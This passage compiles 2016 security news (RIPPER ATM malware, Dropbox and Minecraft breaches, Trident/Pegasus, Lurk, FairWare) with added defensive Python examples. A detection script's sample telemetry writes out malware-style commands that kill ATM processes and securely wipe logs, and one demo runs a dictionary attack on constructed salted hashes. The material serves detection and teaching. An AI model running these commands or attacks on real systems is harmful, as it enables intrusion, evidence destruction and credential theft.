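              f"outbound_bytes={h['outbound_bytes']}")
    print("exfiltration candidates:", exfil_candidates(result))
```

The matching is purely passive, which is the point of the alert’s “do not touch or ping” instruction: probing a listed address tells its operator that the alert reached you and can destroy the investigative value of the indicator.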

The TTPs adopted by the attackers suggest the involvement of Russian hackers; one of the IP addresses included in the alert has surfaced before on Russian underground hacker forums.

Menzel, the Illinois election official, confirmed that the FBI is investigating a possible link between the Democratic National Committee hack and the attacks against the two state election systems.

The RIPPER malware linked to the recent ATM attacks in Thailand
31.8.2016 securityaffairs Virus

Experts from FireEye who analyzed the RIPPER malware believe it was used by crooks in the recent wave of cyber attacks against ATM in Thailand.
Earlier this month, malware was used by a criminal organization to steal 12 million baht from ATMs in Thailand.

According to FireEye, the malware was uploaded for the first time to the online scanning service VirusTotal on Aug. 23, 2016. The malicious code was uploaded from an IP address in Thailand a few minutes after the cyber heist was reported by the media.

Experts from FireEye who analyzed the malware, dubbed RIPPER because researchers found the “ATMRIPPER” name in the sample, revealed that it implemented techniques not seen before.

Hackers belonging to a cybercrime gang from Eastern Europe have stolen over 12 million baht (approximately US$346,000) from 21 ATMs in Thailand.

The Central Bank of Thailand (BoT) has issued a warning to all the banks operating in the country about security vulnerabilities that plague roughly 10,000 ATMs. It seems that hackers exploited such flaws to steal cash from the ATMs. The same gang was involved in similar attacks against the top eight banks in Taiwan, where the thieves stole NT$70 million ($2.2 million) in cash, forcing the banks to shut down hundreds of their cash machines.

The warning issued by the Central Bank of Thailand follows the decision of the Government Savings Bank (GSB) to shut down roughly 3,000 ATMs of its 7,000 machines in response to a recent wave of attacks that targeted its machines.

According to FireEye, the RIPPER malware borrows multiple features from other ATM malware:

Targets the same ATM brand.
The technique used to expel currency follows the same strategy (already documented) performed by Padpin (Tyupkin), SUCEFUL and GreenDispenser.
Similar to SUCEFUL, it is able to control the Card Reader device to Read or Eject the card on demand.
Can disable the local network interface, similar to capabilities of the Padpin family.
Uses the “sdelete” secure deletion tool, similar to GreenDispenser, to remove forensic evidence.
Enforces a limit of 40 bank notes per withdrawal consistently, which is the maximum allowed by the ATM vendor.
The RIPPER malware also implements new features, for example, it was designed to target three of the main ATM Vendors worldwide, which is a first.

The RIPPER malware interacts with the ATM once a specially manufactured ATM card with an EMV chip is inserted; with this mechanism the crooks authenticate themselves to the cash machine. This mechanism is uncommon, although the Skimmer malware uses it too.

In order to gain persistence, the RIPPER malware either runs as a standalone service or masquerades as a legitimate ATM process.

When RIPPER is installed as a service, it first kills the process “dbackup.exe”, then replaces it with its own binary, and then installs the persistent service “DBackup Service.”

“RIPPER can stop or start the “DBackup Service” with the following arguments:

“service start” or “service stop”

RIPPER also supports the following command line switches:

/autorun: Will Sleep for 10 minutes and then run in the background, waiting for interaction.

/install: RIPPER will replace the ATM software running on the ATM as follows:

Upon execution, RIPPER will kill the processes running in memory for the three targeted ATM Vendors via the native Windows “taskkill” tool.

RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself. This technique allows the malware to maintain the legitimate program name to avoid suspicion.” continues FireEye.

When RIPPER malware is executed without any parameters, it performs a series of actions, such as connecting with the local peripherals (i.e. Cash Dispenser, Card Reader, and the Pinpad).

When the threat detects a card with a malicious EMV chip, it starts a timer that allows a crook to control the ATM via the Pinpad.

The crooks can perform multiple malicious actions, including clearing logs and shutting down the ATM’s local network interface.
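The behaviours FireEye describes (taskkill against the ATM software, dbackup.exe replaced by a binary in an unexpected location, creation of the “DBackup Service”, the /install and /autorun switches, the “service start”/“service stop” arguments, and sdelete runs) are all visible in ordinary process-creation telemetry. The following host-side triage sketch is an added example, not FireEye’s code or anything from the article. The pipe-separated event format, the expected install directory of the legitimate dbackup.exe, the ATM application name “atmapp.exe”, the rule weights and the alert threshold are all assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Constructed events in a Sysmon-like "process create" layout (not real telemetry):
# time | image path | command line | parent image
SAMPLE_EVENTS = """\
2016-08-20T02:10:01 | C:\\Windows\\System32\\taskkill.exe | taskkill /F /IM atmapp.exe | C:\\Users\\svc\\dbackup.exe
2016-08-20T02:10:02 | C:\\Users\\svc\\dbackup.exe | dbackup.exe /install | C:\\Windows\\explorer.exe
2016-08-20T02:10:05 | C:\\Windows\\System32\\sc.exe | sc create "DBackup Service" binPath= C:\\Users\\svc\\dbackup.exe | C:\\Users\\svc\\dbackup.exe
2016-08-20T02:10:09 | C:\\Users\\svc\\dbackup.exe | dbackup.exe service start | C:\\Windows\\System32\\services.exe
2016-08-20T02:11:00 | C:\\Tools\\sdelete.exe | sdelete -p 3 C:\\ATM\\logs\\*.log | C:\\Users\\svc\\dbackup.exe
2016-08-20T08:00:00 | C:\\Program Files\\ATM\\dbackup.exe | dbackup.exe | C:\\Windows\\System32\\services.exe
2016-08-20T08:05:00 | C:\\Windows\\System32\\notepad.exe | notepad.exe readme.txt | C:\\Windows\\explorer.exe
"""


@dataclass
class Event:
    ts: str
    image: str
    cmdline: str
    parent: str


# Where the legitimate dbackup.exe is expected to live (assumption for this example).
EXPECTED_DBACKUP_DIRS = ("c:\\program files\\atm\\",)

# Indicator rules derived from the behaviours in the article. Weights are assumptions:
# a single indicator is common in benign operation, a cluster of them is not.
RULES = [
    ("taskkill_of_atm_process", 2,
     lambda e: e.image.lower().endswith("taskkill.exe") and "/im" in e.cmdline.lower()),
    ("dbackup_from_unexpected_path", 3,
     lambda e: e.image.lower().endswith("dbackup.exe")
     and not e.image.lower().startswith(EXPECTED_DBACKUP_DIRS)),
    ("dbackup_service_created", 3,
     lambda e: "dbackup service" in e.cmdline.lower()),
    ("ripper_switch", 2,
     lambda e: re.search(r"\s/(install|autorun)\b", e.cmdline, re.I) is not None),
    ("service_start_stop_arg", 1,
     lambda e: re.search(r"\bservice (start|stop)\b", e.cmdline, re.I) is not None),
    ("sdelete_wipe", 2,
     lambda e: e.image.lower().endswith("sdelete.exe")),
]


def parse_events(text):
    """Turn the pipe-separated sample into Event objects, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(" | ")]
        if len(parts) != 4:
            continue
        events.append(Event(*parts))
    return events


def evaluate(event):
    """Return (matched rule names, summed weight) for one event."""
    matched = [(name, w) for name, w, pred in RULES if pred(event)]
    return [n for n, _ in matched], sum(w for _, w in matched)


def triage(text, threshold=5):
    """Score every event on the host; return (findings, total_score, alert).

    Alerting on the accumulated score rather than per event keeps a lone sdelete
    run or a benign service restart from paging anyone, while the install sequence
    described in the article (kill, replace, register service, start) adds up fast.
    """
    findings = []
    total = 0
    for e in parse_events(text):
        names, score = evaluate(e)
        if names:
            findings.append((e.ts, names))
            total += score
    return findings, total, total >= threshold


if __name__ == "__main__":
    findings, total, alert = triage(SAMPLE_EVENTS)
    for ts, names in findings:
        print(ts, names)
    print("total score:", total, "alert:", alert)
```

The legitimate dbackup.exe running from its expected directory (the 08:00 event) scores nothing, which is the property that matters: the detection keys on where the binary runs from and what it does, not on the file name the malware deliberately reuses.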

Back to the Thailand attacks: the similarities between the RIPPER malware and the malicious code used by the gang are reported below.

Ripper malware thailand cases

Minecraft World Map data breach, 71,000 accounts leaked online
31.8.2016 securityaffairs Hacking

The popular security expert Troy Hunt reported some 71,000 user accounts and IP addresses have been leaked from the website Minecraft World Map.
Another data breach affects the gaming industry: this time, 71,000 Minecraft World Map accounts have been leaked online after the ‘hack.’

Some 71,000 user accounts and IP addresses have been leaked from Minecraft fan website Minecraft World Map.

The Minecraft World Map site is very popular within the Minecraft gaming community; gamers can use the site to share the worlds they have built.

The popular security expert Troy Hunt reported the data dumps, which include 71,000 user accounts and IP addresses.

Have I been pwned? (@haveibeenpwned) tweeted on 29 Aug 2016: “New breach: Minecraft World Map had 71k user accounts hacked in Jan. 55% were already in @haveibeenpwned https://haveibeenpwned.com”
Exposed records include email addresses, IP address data and login credentials for the popular site Minecraft World Map; Troy Hunt clarified that the passwords included in the dumps were salted and hashed.

Minecraft World Map website hacked

A rapid check allowed the Australian expert to verify that more than half of the compromised accounts were already listed in his online service haveibeenpwned.com, which allows users to discover if they have an account that has been compromised in a data breach.

According to the experts, the website Minecraft World Map was breached in January 2016, but the incident was not publicly reported.

“In approximately January 2016, the Minecraft World Map site designed for sharing maps created for the game was hacked and over 71k user accounts were exposed. The data included usernames, email and IP addresses along with salted and hashed passwords.

Compromised data: Email addresses, IP addresses, Passwords, Usernames” Hunt wrote on his website.

Users have to reset their passwords on the Minecraft World Map and on any other website that shares the same login credentials.
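Both this incident and the Spotify resets above come down to the same defensive check: is the password a user is choosing (or reusing) already present in a breach corpus? The example below is added here and is not code from either article or from Have I Been Pwned; it models the k-anonymity range lookup that Have I Been Pwned later offered for passwords, which goes beyond what the 2016 articles describe. The client hashes the password locally and sends only the first five hex characters of the SHA-1 hash, so the service never learns the password. The breach corpus, its counts and the `range_query` server stand-in are constructed for this example; the 12-character minimum is an assumption.

```python
import hashlib

# Constructed stand-in for a breach corpus: SHA-1 of passwords seen in dumps, with
# how often each was seen. Constructed values, not real breach data.
_CORPUS_PLAINTEXT = {"password": 3000000, "minecraft123": 420, "Spotify2016!": 3}


def _sha1_hex(s):
    return hashlib.sha1(s.encode("utf-8")).hexdigest().upper()


# The service stores only hashes; plaintexts above exist just to build the sample.
BREACH_CORPUS = {_sha1_hex(p): n for p, n in _CORPUS_PLAINTEXT.items()}


def range_query(prefix5):
    """Server side: return every stored suffix (hash[5:]) and count for a 5-hex prefix.

    The server sees 20 bits of a 160-bit hash, so it cannot tell which of the
    many candidate passwords behind that prefix the client actually holds.
    """
    if len(prefix5) != 5 or any(c not in "0123456789ABCDEF" for c in prefix5):
        raise ValueError("prefix must be 5 uppercase hex characters")
    return {h[5:]: n for h, n in BREACH_CORPUS.items() if h.startswith(prefix5)}


def exposure_count(password, query=range_query):
    """Client side: hash locally, send only the prefix, match the suffix locally.

    `query` is injected so the same client logic can call a real range endpoint.
    """
    h = _sha1_hex(password)
    return query(h[:5]).get(h[5:], 0)


def reuse_policy(password, min_length=12):
    """Decide whether a password may be set on this service.

    A password seen even once in a breach is rejected: credential-stuffing
    attacks replay exactly these leaked pairs against other services.
    """
    if len(password) < min_length:
        return "too short"
    if exposure_count(password) > 0:
        return "seen in a breach"
    return "ok"


if __name__ == "__main__":
    for candidate in ["password", "Spotify2016!", "long-unique-passphrase-zq7"]:
        print(candidate, "->", reuse_policy(candidate),
              "(seen", exposure_count(candidate), "times)")
```

Salting and hashing, as the Minecraft World Map site did, protects stored passwords from being read out of a stolen database; it does nothing against a user who has already reused the same password on a service that stored it badly, which is the gap this kind of check closes at registration and password-change time.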

This is the latest incident in the gaming industry to be disclosed online; recently, security vulnerabilities in the vBulletin platform exposed more than 27 million accounts, many of them belonging to gamers on mail.ru.

A closer look at the compromised mail.ru accounts shows they come from CFire, parapa.mail.ru (ParaPa Dance City game), and tanks.mail.ru (Ground War: Tank game).

Lurk cybercrime gang developed, maintained and rented the Angler EK
31.8.2016 securityaffairs Crime

Experts from Kaspersky Lab confirmed that the Lurk cybercrime gang developed, maintained and rented the infamous Angler Exploit Kit.
Security experts from Kaspersky Lab have confirmed that the Lurk cybercrime group was the author of the infamous Angler exploit kit. The members of the Lurk cybercrime crew were arrested by Russian law enforcement this summer; according to the experts, they also offered the Angler exploit kit for rent, and after the arrests it disappeared from the exploit landscape.

Law enforcement arrested suspects in June, authorities accused them of stealing around $45 million USD from Russian financial institutions by using the Lurk banking trojan.

According to the Cisco Talos researchers, a rapid disappearance of the Angler EK in the wild was observed after the arrests of the individuals behind the Lurk banking trojan.

Malware researchers confirmed that the overall traffic related to other EKs shows a drastic fall, around 96% since early April.

The Angler and Nuclear exploit kits rapidly disappeared, likely due to the operations conducted by the law enforcement in the malware industry.

A joint investigation conducted by the Russian Police and Kaspersky Lab allowed the identification of the individuals behind the Lurk malware. The experts have now confirmed that the Lurk group was also responsible for developing and maintaining the Angler exploit kit, which they called “XXX.”

Experts from Kaspersky published a blog post that details how the security firm helped law enforcement in catching the Lurk cybercrime group.

The experts explained that the Lurk gang started renting the Angler Exploit Kit after their fraudulent activities became less profitable.

“In addition to increasing the number of “minor” attacks, the cybercriminals were trying to solve their cash flow problem by “diversifying” the business and expanding their field of activity. This included developing, maintaining and renting the Angler exploit pack (also known as XXX). Initially, this was used mainly to deliver Lurk to victims’ computers. But as the number of successful attacks started to decline, the owners began to offer smaller groups paid access to the tools.”

“Judging by what we saw on Russian underground forums for cybercriminals, the Lurk gang had an almost legendary status,” reads the post. “So when Lurk provided other cybercriminals with access to Angler, the exploit pack became especially popular – a ‘product’ from the top underground authority did not need advertising.”

Lurk first appeared on the scene in 2011 when its activities were first spotted by Kaspersky experts. Kaspersky initially determined the Lurk cybercrime group was composed of roughly 15 people. Across the years the number of members of the criminal gang increased to 40.

lurk cybercrime gang

Kaspersky also provided an estimation of the cost for the Lurk infrastructure that reached tens of thousands of dollars per month.

“The criminal group had an extensive and extremely costly network infrastructure, so, in addition to employees’ salaries, it was necessary to pay for renting servers, VPN and other technical tools. Our estimates suggest that the network infrastructure alone cost the Lurk managers tens of thousands of dollars per month.” continues the post.

Saudi government facilities hit by cyber attacks, Saudi cyber experts convened

31.8.2016 securityaffairs Hacking

Saudi government facilities have been hit by cyber attacks; the Government is investigating with the support of Saudi cyber experts.
Saudi government facilities have been targeted by major cyber attacks, in response, the Government has convened a group of cyber experts to examine the events.

According to the Saudi Press Agency, Saudi cyber experts held urgent talks on Tuesday after the cyber attack “in recent weeks targeted government institutions and vital installations in the kingdom.”

At the time of writing there is no information about the targeted agencies or about the alleged threat actor behind the cyber attacks against Saudi infrastructure.

Photo caption: In this Monday, Oct. 6, 2003 file photo, the Saudi Arabian capital Riyadh with the ‘Kingdom Tower’ is photographed through a window of the ‘Al-Faislia Tower’. Saudi Arabia’s stock exchange has opened up to direct foreign investment for the first time. The decision to open up the Tadawul stock exchange on Monday comes at a crucial time for Saudi Arabia, whose revenue has taken a hit from the plunge in oil prices over the past year. The kingdom is the world’s largest exporter of crude. (AP Photo/Markus Schreiber, File)

The Saudi cyber security experts were involved in the investigation and according to the Saudi Press Agency, the kingdom’s Cybersecurity Centre “held an urgent workshop with a number of parties” to discuss the results of its investigations.

The attacks were launched from abroad; the attackers targeted Saudi websites with spyware to steal sensitive information from the targets.

This isn’t the first time that Saudi websites have been hit by cyber attacks: in June, hackers attacked a major Saudi newspaper and gained control of it to publish fake news.

The Saudi cyber experts analyzed the attacks and proposed the necessary countermeasures to defeat the threat and protect the information targeted by the hackers.

Experts exposed the “necessary procedures to fix and to protect those sites”, reported the Saudi Press Agency.

The most clamorous attack against Saudi facilities occurred in 2012, when a virus infected 30,000 workstations of Saudi Aramco, one of the world’s largest energy companies.

iOS 9.3.4 and earlier versions are vulnerable to the Trident Exploit

31.8.2016 securityaffeairs iOS

Its name is Trident: a chain of zero-day exploits used to infect iPhones with commercial spyware. Researchers say it belongs to an exploit infrastructure connected to the NSO Group.


Researchers from Citizen Lab and the security firm Lookout responsibly disclosed the exploits and the related vulnerabilities to Apple.
Given the severity of Trident, Apple patched the vulnerabilities extremely quickly and released iOS 9.3.5 to address them.

In this post we want to describe the inner logic of the Trident exploit rather than the attack received by Ahmed Mansoor.
The Mansoor episode does, however, show the infection vector of the exploit: a link delivered by SMS, email, social media, or any other kind of message.

The most frightening part of the attack is that the only action the user has to take to trigger it is a single click on an external link.
The exploit contains the logic to remotely jailbreak an iPhone, install arbitrary applications and then deliver the commercial spyware Pegasus to track the victim.

What is Pegasus and who is behind it?

Pegasus is spyware installable on iOS devices that allows reading messages, emails, passwords and address lists, as well as eavesdropping on phone calls, making and transmitting audio recordings and tracking the location of a compromised device (its features are listed in more detail in a later section).
The spyware is attributed to NSO Group, an Israeli firm based in Herzliya, in the country’s “Silicon Valley”.

The attribution to NSO Group rests on the domain used in the phishing message sent to Mansoor (webdav.co): it belongs to a network of domains that is part of an exploit infrastructure provided by NSO Group.

NSO Group, now owned by US private equity firm Francisco Partners Management, has flown far under the radar, without even a website.

Citizen Lab reported that simply opening the link included in the message on an iPhone running iOS 9.3.3 resulted in previously unknown software being remotely implanted on the device through the delivery of unknown exploits from that link.
This exploit chain was given the name Trident.

Once the user takes the bait, the exploit starts infecting the phone in the three main stages of the attack, described in more detail below:

Delivery and WebKit vulnerability
This stage comes down over the initial URL in the form of an HTML file that exploits a vulnerability (CVE-2016-4657) in WebKit (used in Safari and other browsers).
CVE-2016-4657: Memory Corruption in Safari WebKit
A memory corruption vulnerability in Safari’s WebKit engine allows an attacker to execute arbitrary code. Pegasus exploits it to obtain initial code execution in the context of the Safari web browser, which is still an unprivileged, sandboxed process; escaping it is the job of the kernel exploits in stage 2.

Jailbreak
This stage is downloaded by the first-stage code based on the device type (32-bit vs 64-bit). Stage 2 is downloaded as an obfuscated and encrypted package. Each package is encrypted with unique keys at each download, so network-based controls that look for a fixed payload signature are ineffective. It contains the code needed to exploit the iOS kernel (CVE-2016-4655 and CVE-2016-4656) and a loader that downloads and decrypts the package for stage 3.

CVE-2016-4655: Kernel Information Leak Circumvents KASLR
Before Pegasus can execute its jailbreak, it must determine where the kernel is located in memory. Kernel Address Space Layout Randomization (KASLR) makes this difficult by mapping the kernel at a different, unpredictable location on each boot. In short, before attacking the kernel, Pegasus has to find it. The attackers found a way to locate the kernel by using a function call that leaks a non-obfuscated kernel memory address in its return value, from which the kernel’s actual location in memory can be computed.
CVE-2016-4656: Memory Corruption in Kernel leads to Jailbreak
The third vulnerability in Pegasus’ Trident is the one used to jailbreak the phone. A memory corruption vulnerability in the kernel is exploited on both the 32- and 64-bit versions, although the exploits are performed differently on each.

Espionage software
This stage is downloaded by stage 2 and is also chosen based on the device type (32-bit vs 64-bit). Stage 3 contains the espionage software, daemons and other processes used after the device has been jailbroken in stage 2. Stage 3 installs hooks into the applications the attacker wishes to spy on. Additionally, stage 3 detects whether the device was previously jailbroken by another method and, if so, removes any access that jailbreak provides, such as SSH. The software also contains a failsafe to remove itself if certain conditions are present.
Jailbreak Persistence

Once the kernel has been exploited, both the 32-bit and 64-bit exploits perform similar tasks to prepare the system to be jailbroken:
• Disable kernel security protections, including code signing
• Remount the system partition
• Clear the Safari caches (to help cover their tracks)
• Write the jailbreak files (including the main loader as /sbin/mount_nfs)
As the final step of stage 2, the exploit removes /etc/nfs.conf, which causes the system to load /sbin/mount_nfs (the stage 3 jailbreak loader). Because /sbin/mount_nfs runs as root, the loader runs with full privileges. After stage 3 is unpacked, Pegasus needs persistence across device reboots, so the exploit replaces the system daemon rtbuddyd with a copy of the jsc (JavaScriptCore) binary and creates a link to a script similar to the exploit for CVE-2016-4657, so that the chain is re-run on each boot.
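The stage 2 actions above leave concrete traces on the filesystem. As an added example (mine, not code from Lookout, Citizen Lab or this article), the Python script below turns them into a check a responder could run over an extracted iOS root filesystem: it looks for a loader at /sbin/mount_nfs with /etc/nfs.conf gone, and for rtbuddyd having become a byte-identical copy of jsc. The locations assumed for rtbuddyd and jsc, and the miniature sample filesystem, are constructed for the example.

```python
import hashlib
import tempfile
from pathlib import Path

# Paths taken from the stage 2 description. The locations of rtbuddyd and jsc
# are assumptions for this example; adjust them for the image being examined.
MOUNT_NFS = "sbin/mount_nfs"
NFS_CONF = "etc/nfs.conf"
RTBUDDYD = "usr/libexec/rtbuddyd"
JSC = "usr/bin/jsc"


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def check_rootfs(root) -> list:
    """Return human-readable findings for an extracted root filesystem at `root`."""
    root = Path(root)
    findings = []

    mount_nfs = root / MOUNT_NFS
    nfs_conf = root / NFS_CONF
    if mount_nfs.exists() and not nfs_conf.exists():
        findings.append("stage 3 loader present at /sbin/mount_nfs and /etc/nfs.conf removed")
    elif mount_nfs.exists():
        findings.append("unexpected binary at /sbin/mount_nfs")

    # Persistence trick: the daemon binary was overwritten with a copy of jsc.
    rtbuddyd = root / RTBUDDYD
    jsc = root / JSC
    if rtbuddyd.exists() and jsc.exists() and sha256_of(rtbuddyd) == sha256_of(jsc):
        findings.append("rtbuddyd is a byte-identical copy of jsc (persistence hook)")

    return findings


def make_sample_rootfs(base, infected: bool) -> Path:
    """Build a constructed mini root filesystem (a real iOS image is far larger)."""
    root = Path(base)
    for rel, content in {
        NFS_CONF: b"# nfs client configuration (constructed stand-in)\n",
        RTBUDDYD: b"\xcf\xfa\xed\xfe rtbuddyd (constructed stand-in)\n",
        JSC: b"\xcf\xfa\xed\xfe jsc (constructed stand-in)\n",
    }.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(content)
    if infected:
        # Mirror the stage 2 steps: drop the loader, delete nfs.conf, clone jsc over rtbuddyd.
        loader = root / MOUNT_NFS
        loader.parent.mkdir(parents=True, exist_ok=True)
        loader.write_bytes(b"\xcf\xfa\xed\xfe loader (constructed stand-in)\n")
        (root / NFS_CONF).unlink()
        (root / RTBUDDYD).write_bytes((root / JSC).read_bytes())
    return root


def run_demo() -> dict:
    """Run the check over a clean and an infected constructed image."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = make_sample_rootfs(Path(tmp) / "clean", infected=False)
        bad = make_sample_rootfs(Path(tmp) / "infected", infected=True)
        return {"clean": check_rootfs(clean), "infected": check_rootfs(bad)}


if __name__ == "__main__":
    for name, findings in run_demo().items():
        print(f"{name}: {findings or ['no indicators']}")
```

On a real image the hash comparison is best replaced by a comparison against Apple’s known-good hashes for the firmware build, which also catches a modified rtbuddyd that is not an exact copy of jsc.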


“Pegasus is one of the most sophisticated pieces of surveillance and espionage software,” Lookout stated. It has a novel mechanism to install and hide itself and obtain persistence on the system. Once it is resident, it uses a number of ways to hide its communications and protect itself from discovery, and it hooks into a large number of the phone’s functions in order to gather data and intercept messages and calls.

Below is the list of features Pegasus uses to spy on the victim (Lookout’s report contains a fully detailed list with references to the source code):

Persistence: JSC Privilege Escalation
Disabling Updates
Jailbreak Detection
Device Monitoring (Current Reachability, Sim and cell network information, Call info, SIM/Network change notification)
Stealth Update to Command & Control Infrastructure
Self Destruction
Steal Calendar
Steal Contacts
Steal GPS location
Capturing User Passwords
WiFi and Router Passwords
Interception of Calls and Messages
Below is an image comparing a phone infected by Pegasus with a normal one:

Image from Lookout


NSO Group reportedly has hundreds of employees and makes millions of dollars in annual revenue, effectively as a cyber arms dealer, from the sale of its sophisticated mobile attack software.

We strongly recommend that all iPhone owners update to the latest version of iOS (9.3.5) immediately.

Dropbox Hacked — More Than 68 Million Account Details Leaked Online
31.8.2016 thehackernews Hacking

Hackers have obtained credentials for more than 68 Million accounts for online cloud storage platform Dropbox from a known 2012 data breach.
Dropbox has confirmed the breach and has already notified its customers of a precautionary forced password reset, though the initial announcement did not specify the exact number of affected users.
However, in a selection of files obtained through sources in the database-trading community and the breach notification service Leakbase, Motherboard found around 5 GB of files containing details on 68,680,741 accounts, including email addresses and salted, hashed passwords of Dropbox users.
An unnamed Dropbox employee verified the legitimacy of the data.
Of the 68 million, almost 32 million passwords are protected with the slow hashing function bcrypt, which makes recovering users’ actual passwords expensive, while the rest are hashed with the much faster SHA-1 algorithm.
The hashes are also believed to be salted: a random string is added to each password before hashing, so identical passwords produce different hashes and precomputed (rainbow) tables become useless. A salt does not, however, slow down guessing of an individual weak password, which is why the SHA-1 portion of the dump is the more exposed one.
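To make that difference concrete, here is an added Python example (mine, not from Dropbox or the article) that hashes a constructed set of leaked records two ways, salted SHA-1 and a slow work-factor KDF, and runs a small dictionary attack against both. scrypt from the standard library stands in for bcrypt, since both impose a tunable cost per guess; the users, passwords, salts and wordlist are all constructed inline.

```python
import hashlib
import os
import time

# Constructed sample users and a tiny wordlist; no real breach data is used.
WORDLIST = ["123456", "password", "dropbox", "summer2012", "letmein", "qwerty"]
PASSWORDS = {
    "alice@example.com": "summer2012",
    "bob@example.com": "summer2012",          # same password as alice
    "carol@example.com": "Tr0ub4dor&3-unique",  # not in the wordlist
}


def sha1_salted(password: str, salt: bytes) -> str:
    """Fast salted hash, as used for the older part of the dump."""
    return hashlib.sha1(salt + password.encode()).hexdigest()


def slow_salted(password: str, salt: bytes) -> str:
    """Work-factor KDF; scrypt stands in for bcrypt here (n is the cost parameter)."""
    return hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32).hex()


def make_leak(hasher) -> list:
    """Return (email, salt, digest) rows with a fresh random 16-byte salt per user."""
    rows = []
    for email, pw in PASSWORDS.items():
        salt = os.urandom(16)
        rows.append((email, salt, hasher(pw, salt)))
    return rows


def rainbow_lookup(rows, wordlist) -> dict:
    """Precomputed unsalted SHA-1 table: finds nothing once salts are in play."""
    table = {hashlib.sha1(w.encode()).hexdigest(): w for w in wordlist}
    return {email: table[digest] for email, _, digest in rows if digest in table}


def dictionary_attack(rows, wordlist, hasher):
    """Per-user guessing with the stolen salt; returns (recovered, guesses, seconds)."""
    recovered, guesses = {}, 0
    start = time.perf_counter()
    for email, salt, digest in rows:
        for word in wordlist:
            guesses += 1
            if hasher(word, salt) == digest:
                recovered[email] = word
                break
    return recovered, guesses, time.perf_counter() - start


def compare() -> dict:
    fast_rows = make_leak(sha1_salted)
    slow_rows = make_leak(slow_salted)
    fast = dictionary_attack(fast_rows, WORDLIST, sha1_salted)
    slow = dictionary_attack(slow_rows, WORDLIST, slow_salted)
    same_pw = {d for e, _, d in fast_rows if PASSWORDS[e] == "summer2012"}
    return {
        "rainbow_hits": rainbow_lookup(fast_rows, WORDLIST),
        "sha1_recovered": fast[0], "sha1_guesses": fast[1], "sha1_seconds": fast[2],
        "slow_recovered": slow[0], "slow_guesses": slow[1], "slow_seconds": slow[2],
        "distinct_hashes_for_shared_password": len(same_pw),
    }


if __name__ == "__main__":
    for k, v in compare().items():
        print(f"{k}: {v}")
```

The salt defeats the precomputed table and hides that alice and bob share a password, but both salted variants fall to the same 14 guesses; only the per-guess cost of the slow KDF changes how long those guesses take, and that ratio is what separates the bcrypt and SHA-1 halves of the dump.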
"We've confirmed that the proactive password reset we completed last week covered all potentially impacted users," said Patrick Heim, Head of Trust and Security for Dropbox.
"We initiated this reset as a precautionary measure so that the old passwords from prior to mid-2012 can’t be used to improperly access Dropbox accounts. We still encourage users to reset passwords on other services if they suspect they may have reused their Dropbox password."
Dropbox initially disclosed the data breach in 2012, notifying users that one of its employee passwords was acquired and used to access a file with users’ email addresses, but the company didn't disclose that the hackers were able to pilfer passwords too.
But earlier this week, Dropbox sent out emails alerting its users that a large chunk of its users’ credentials had been obtained in the 2012 data breach and may soon appear on Dark Web marketplaces, prompting them to change their password if they hadn’t changed it since mid-2012.
"Our security teams are always watching out for new threats to our users. As part of these ongoing efforts, we learned about an old set of Dropbox user credentials (email addresses plus hashed and salted passwords) that we believe were obtained in 2012," the company wrote. "Our analysis suggests that the credentials relate to an incident we disclosed around that time."
Dropbox is the latest to join the list of “mega-breaches” revealed this summer, when hundreds of millions of online credentials from years-old data breaches of popular sites, including LinkedIn, MySpace, VK.com and Tumblr, were sold on the Dark Web.
The takeaway:
Change your password for Dropbox as well as for other online accounts immediately, especially if you use the same password for multiple websites.
Also use a good password manager to create unique, complex passwords for different sites and remember them for you; we have previously listed some of the best password managers to help you choose one according to your requirements.

Linux servers hit with FairWare ransomware – or is it just a scam?

30.8.2016 nethelpsecurity

Users posting on Bleeping Computer’s forums have alerted the world to a new threat targeting Linux server admins: the FairWare ransomware.

Whether the ransomware actually exists or not is still up for debate, as we only have the attackers’ claim that they are using it. It’s perfectly possible that they managed to compromise servers – apparently, through a brute-force SSH attack – and simply deleted the data they claim to have stolen.

Victims of the attack find their web folder deleted, and in its place a ransom note pointing them to an online paste.

There, they find the ransom note, saying that their server has been infected with “a ransomware variant called FAIRWARE,” that they have two weeks to send 2 Bitcoin to a specified address, and that they can contact the attackers via email, but should not expect to see proof that the attackers have the stolen files:


This definitely adds to the suspicion that they might have simply deleted the files in question and, even if the victims pay, they might not get them back.

“Most ransomware developers don’t just delete files, as it would quickly be found out and no one would pay the ransom,” Bleeping Computer’s Lawrence Abrams noted.

“It’s possible they gzipped the www folders, uploaded it, and then deleted it. Unfortunately, won’t know unless you email them.”

So far, the attackers’ Bitcoin address has yet to show evidence of a ransom payment. This threat is very recent, and the two week payment deadline is still far off, so victims are likely still trying to discover whether paying the ransom will bring their files back and are looking for answers online.

The son of a Russian lawmaker could face up to 40 years in the jail for hacking
30.8.2016 securityaffeairs Hacking

Roman Seleznev (32), the son of Russian lawmaker and Parliament member Valery Seleznev, has been convicted of stealing 2.9 million credit card numbers.
Roman Seleznev (32), the son of the notorious Russian lawmaker and Parliament member Valery Seleznev, has been convicted in the US of hacking businesses and stealing 2.9 million US credit card numbers using Point-of-Sale (POS) malware.

“A federal jury today convicted a Vladivostok, Russia, man of 38 counts related to his scheme to hack into point-of-sale computers to steal and sell credit card numbers to the criminal underworld, announced Assistant Attorney General Leslie R. Caldwell of the Justice Department’s Criminal Division and U.S. Attorney Annette L. Hayes of the Western District of Washington. ” reads the announcement published by the DoJ.

According to the Department of Justice, the hacking scheme defrauded banks of more than $169 Million. The stolen credit card data were offered for sale on multiple “carding” websites.

“Testimony at trial revealed that Seleznev’s scheme caused 3,700 financial institutions more than $169 million in losses.” continues the note published by the DoJ.


Seleznev, who used the online moniker ‘Track2’, was convicted in a Washington court on Thursday of 38 charges related to stolen credit card details:

Ten counts of wire fraud
Nine counts of obtaining information from a protected computer
Nine counts of possession of 15 or more unauthorized access devices
Eight counts of intentional damage to a protected computer
Two counts of aggravated identity theft
